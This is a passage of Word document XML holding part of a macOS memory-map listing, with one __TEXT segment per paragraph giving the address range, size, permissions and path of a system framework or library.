    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcade6000-00007fffcadf8000 [   72K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/HelpData.framework/Versions/A/HelpData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcb3f8000-00007fffcb400000 [   32K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/IOAccelerator.framework/Versions/A/IOAccelerator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcb400000-00007fffcb401000 [    4K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/IOPlatformPluginFamily.framework/Versions/A/IOPlatformPluginFamily</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcb401000-00007fffcb416000 [   84K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/IOPresentment.framework/Versions/A/IOPresentment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcb416000-00007fffcb439000 [  140K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/IconServices.framework/Versions/A/IconServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcb4d3000-00007fffcb4e4000 [   68K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/IntlPreferences.framework/Versions/A/IntlPreferences</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcb51a000-00007fffcb6cf000 [ 1748K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/LanguageModeling.framework/Versions/A/LanguageModeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcb6da000-00007fffcb6fb000 [  132K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/LoggingSupport.framework/Versions/A/LoggingSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcb6fb000-00007fffcb700000 [   20K] r-x/r-x SM=COW  ...ry/PrivateFrameworks/LoginUIKit.framework/Versions/A/Frameworks/LoginUICore.framework/Versions/A/LoginUICore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffcb7a9000-00007fffcb87b000 [  840K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/MMCS.framework/Versions/A/MMCS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcbd14000-00007fffcbd18000 [   16K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Mangrove.framework/Versions/A/Mangrove</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcbdef000-00007fffcbe24000 [  212K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/MediaKit.framework/Versions/A/MediaKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcbf7a000-00007fffcbff3000 [  484K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/MetalPerformanceShaders.framework/Versions/A/MetalPerformanceShaders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcbff3000-00007fffcc004000 [   68K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/MobileAsset.framework/Versions/A/MobileAsset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcc004000-00007fffcc158000 [ 1360K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/MobileDevice.framework/Versions/A/MobileDevice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcc158000-00007fffcc164000 [   48K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/MobileKeyBag.framework/Versions/A/MobileKeyBag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcc174000-00007fffcc19d000 [  164K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/MultitouchSupport.framework/Versions/A/MultitouchSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcc249000-00007fffcc254000 [   44K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/NetAuth.framework/Versions/A/NetAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcc648000-00007fffcc64b000 [   12K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/OAuth.framework/Versions/A/OAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcca2f000-00007fffcca71000 [  264K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/PerformanceAnalysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffccab4000-00007fffccabc000 [   32K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/PhoneNumbers.framework/Versions/A/PhoneNumbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcd06d000-00007fffcd090000 [  140K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/PlugInKit.framework/Versions/A/PlugInKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffcd0d6000-00007fffcd102000 [  176K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ProtectedCloudStorage.framework/Versions/A/ProtectedCloudStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcd102000-00007fffcd11d000 [  108K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ProtocolBuffer.framework/Versions/A/ProtocolBuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcd11d000-00007fffcd12e000 [   68K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/QuickLookThumbnailing.framework/Versions/A/QuickLookThumbnailing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcd136000-00007fffcd15a000 [  144K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/RemoteViewServices.framework/Versions/A/RemoteViewServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcdd8c000-00007fffcdd90000 [   16K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/SecCodeWrapper.framework/Versions/A/SecCodeWrapper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcdd9e000-00007fffcde1d000 [  508K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ShareKit.framework/Versions/A/ShareKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcde1d000-00007fffcde9a000 [  500K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Sharing.framework/Versions/A/Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcde9a000-00007fffcdeba000 [  128K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Shortcut.framework/Versions/A/Shortcut</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcdeba000-00007fffce10d000 [ 2380K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/SkyLight.framework/Versions/A/SkyLight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce2e6000-00007fffce2f3000 [   52K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/SpeechRecognitionCore.framework/Versions/A/SpeechRecognitionCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce676000-00007fffce6d6000 [  384K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Suggestions.framework/Versions/A/Suggestions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce6dc000-00007fffce6e6000 [   40K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftAppKit.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce6f1000-00007fffce8db000 [ 1960K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftCore.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffce8e9000-00007fffce8ef000 [   24K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftCoreData.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce8ef000-00007fffce8fc000 [   52K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftCoreGraphics.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce8fc000-00007fffce900000 [   16K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftCoreImage.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce90d000-00007fffce914000 [   28K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftDarwin.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce914000-00007fffce917000 [   12K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftDispatch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce91e000-00007fffce963000 [  276K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftFoundation.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce978000-00007fffce97b000 [   12K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftIOKit.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce986000-00007fffce98d000 [   28K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftObjectiveC.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffce9d6000-00007fffcea43000 [  436K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Symbolication.framework/Versions/A/Symbolication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcec2b000-00007fffcec58000 [  180K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/SystemAdministration.framework/Versions/A/SystemAdministration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcee39000-00007fffcee40000 [   28K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/TCC.framework/Versions/A/TCC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffceecb000-00007fffcf08d000 [ 1800K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/TextureIO.framework/Versions/A/TextureIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcf0d5000-00007fffcf0eb000 [   88K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ToneKit.framework/Versions/A/ToneKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcf0eb000-00007fffcf0fa000 [   60K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ToneLibrary.framework/Versions/A/ToneLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffcf100000-00007fffcf102000 [    8K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/TrustEvaluationAgent.framework/Versions/A/TrustEvaluationAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcf102000-00007fffcf292000 [ 1600K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/UIFoundation.framework/Versions/A/UIFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcfce2000-00007fffcfd92000 [  704K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/ViewBridge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd01b9000-00007fffd01c0000 [   28K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/XPCService.framework/Versions/A/XPCService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0290000-00007fffd0293000 [   12K] r-x/r-x SM=COW  ...brary/PrivateFrameworks/login.framework/Versions/A/Frameworks/loginsupport.framework/Versions/A/loginsupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd02be000-00007fffd02e6000 [  160K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/vCard.framework/Versions/A/vCard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd02e7000-00007fffd0303000 [  112K] r-x/r-x SM=COW  /usr/lib/libCRFSuite.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0303000-00007fffd030f000 [   48K] r-x/r-x SM=COW  /usr/lib/libChineseTokenizer.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd030f000-00007fffd03a0000 [  580K] r-x/r-x SM=COW  /usr/lib/libCoreStorage.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd03a0000-00007fffd03a2000 [    8K] r-x/r-x SM=COW  /usr/lib/libDiagnosticMessagesClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd03a2000-00007fffd05b6000 [ 2128K] r-x/r-x SM=COW  /usr/lib/libFosl_dynamic.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd05d1000-00007fffd05d9000 [   32K] r-x/r-x SM=COW  /usr/lib/libMatch.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd05d9000-00007fffd05da000 [    4K] r-x/r-x SM=COW  /usr/lib/libOpenScriptingUtil.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd05da000-00007fffd05de000 [   16K] r-x/r-x SM=COW  /usr/lib/libScreenReader.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffd05de000-00007fffd05e0000 [    8K] r-x/r-x SM=COW  /usr/lib/libSystem.B.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd064b000-00007fffd0677000 [  176K] r-x/r-x SM=COW  /usr/lib/libarchive.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0677000-00007fffd06ec000 [  468K] r-x/r-x SM=COW  /usr/lib/libate.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd06ef000-00007fffd06f0000 [    4K] r-x/r-x SM=COW  /usr/lib/libauto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd06f0000-00007fffd0701000 [   68K] r-x/r-x SM=COW  /usr/lib/libbsm.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0701000-00007fffd0710000 [   60K] r-x/r-x SM=COW  /usr/lib/libbz2.1.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0710000-00007fffd0767000 [  348K] r-x/r-x SM=COW  /usr/lib/libc++.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0767000-00007fffd0792000 [  172K] r-x/r-x SM=COW  /usr/lib/libc++abi.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0792000-00007fffd07a3000 [   68K] r-x/r-x SM=COW  /usr/lib/libcmph.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd07a3000-00007fffd07b9000 [   88K] r-x/r-x SM=COW  /usr/lib/libcompression.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd07b9000-00007fffd07ba000 [    4K] r-x/r-x SM=COW  /usr/lib/libcoretls.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd07ba000-00007fffd07bc000 [    8K] r-x/r-x SM=COW  /usr/lib/libcoretls_cfhelpers.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0875000-00007fffd095a000 [  916K] r-x/r-x SM=COW  /usr/lib/libcrypto.0.9.8.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0aeb000-00007fffd0af7000 [   48K] r-x/r-x SM=COW  /usr/lib/libcsfde.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0af7000-00007fffd0b4b000 [  336K] r-x/r-x SM=COW  /usr/lib/libcups.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffd0b4b000-00007fffd0b9b000 [  320K] r-x/r-x SM=COW  /usr/lib/libcurl.4.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0b9b000-00007fffd0ba3000 [   32K] r-x/r-x SM=COW  /usr/lib/libdscsym.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0bc4000-00007fffd0bc5000 [    4K] r-x/r-x SM=COW  /usr/lib/libenergytrace.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0bd4000-00007fffd0bda000 [   24K] r-x/r-x SM=COW  /usr/lib/libheimdal-asn1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0bda000-00007fffd0ccd000 [  972K] r-x/r-x SM=COW  /usr/lib/libiconv.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0ccd000-00007fffd0ef3000 [ 2200K] r-x/r-x SM=COW  /usr/lib/libicucore.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0ef8000-00007fffd0efa000 [    8K] r-x/r-x SM=COW  /usr/lib/liblangid.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0efa000-00007fffd0f14000 [  104K] r-x/r-x SM=COW  /usr/lib/liblzma.5.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0f14000-00007fffd0f2b000 [   92K] r-x/r-x SM=COW  /usr/lib/libmarisa.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd0f2b000-00007fffd11d6000 [ 2732K] r-x/r-x SM=COW  /usr/lib/libmecabra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1208000-00007fffd1282000 [  488K] r-x/r-x SM=COW  /usr/lib/libnetwork.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1282000-00007fffd1653000 [ 3908K] r-x/r-x SM=COW  /usr/lib/libobjc.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1653000-00007fffd1655000 [    8K] r-x/r-x SM=COW  /usr/lib/libodfde.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1655000-00007fffd165a000 [   20K] r-x/r-x SM=COW  /usr/lib/libpam.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd165a000-00007fffd168b000 [  196K] r-x/r-x SM=COW  /usr/lib/libpcap.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffd16a8000-00007fffd16c5000 [  116K] r-x/r-x SM=COW  /usr/lib/libresolv.9.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd16c5000-00007fffd16ff000 [  232K] r-x/r-x SM=COW  /usr/lib/libsandbox.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd16ff000-00007fffd1712000 [   76K] r-x/r-x SM=COW  /usr/lib/libsasl2.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1712000-00007fffd1714000 [    8K] r-x/r-x SM=COW  /usr/lib/libspindump.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1714000-00007fffd185d000 [ 1316K] r-x/r-x SM=COW  /usr/lib/libsqlite3.dylib</w:t>
      </w:r>
